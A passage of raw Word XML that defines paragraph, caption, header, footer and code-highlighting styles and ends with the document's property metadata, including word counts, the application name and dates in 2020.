      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Date"/>
    <w:next w:val="a0"/>
    <w:qFormat/>
    <w:rsid w:val="00D51E6E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D51E6E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D51E6E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a0"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D51E6E"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  <w:rsid w:val="00D51E6E"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D51E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rsid w:val="00D51E6E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D51E6E"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char"/>
    <w:rsid w:val="00D51E6E"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableCaption">
    <w:name w:val="Table Caption"/>
    <w:basedOn w:val="aa"/>
    <w:rsid w:val="00D51E6E"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ImageCaption">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="aa"/>
    <w:rsid w:val="00D51E6E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Figure">
    <w:name w:val="Figure"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00D51E6E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CaptionedFigure">
    <w:name w:val="Captioned Figure"/>
    <w:basedOn w:val="Figure"/>
    <w:rsid w:val="00D51E6E"/>
    <w:pPr>
      <w:keepNext/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="题注 Char"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="aa"/>
    <w:rsid w:val="00D51E6E"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimChar">
    <w:name w:val="Verbatim Char"/>
    <w:basedOn w:val="Char"/>
    <w:link w:val="SourceCode"/>
    <w:rsid w:val="00D51E6E"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SectionNumber">
    <w:name w:val="Section Number"/>
    <w:basedOn w:val="Char"/>
    <w:rsid w:val="00D51E6E"/>
  </w:style>
  <w:style w:type="character" w:styleId="ab">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Char"/>
    <w:rsid w:val="00D51E6E"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ac">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Char"/>
    <w:rsid w:val="00D51E6E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rsid w:val="00D51E6E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rsid w:val="00D51E6E"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KeywordTok">
    <w:name w:val="KeywordTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00D51E6E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D51E6E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D51E6E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D51E6E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D51E6E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sid w:val="00D51E6E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D51E6E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sid w:val="00D51E6E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D51E6E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D51E6E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D51E6E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D51E6E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D51E6E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sid w:val="00D51E6E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sid w:val="00D51E6E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D51E6E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sid w:val="00D51E6E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sid w:val="00D51E6E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sid w:val="00D51E6E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D51E6E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D51E6E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D51E6E"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:rsid w:val="00D51E6E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D51E6E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D51E6E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sid w:val="00D51E6E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D51E6E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sid w:val="00D51E6E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sid w:val="00D51E6E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sid w:val="00D51E6E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D51E6E"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D10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d"/>
    <w:rsid w:val="00D10F3F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char1"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D10F3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e"/>
    <w:rsid w:val="00D10F3F"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char2"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005F2104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1"/>
    <w:link w:val="af"/>
    <w:semiHidden/>
    <w:rsid w:val="005F210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930</Words>
  <Characters>5301</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>44</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6219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Administrator</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-04T07:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-11T08:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>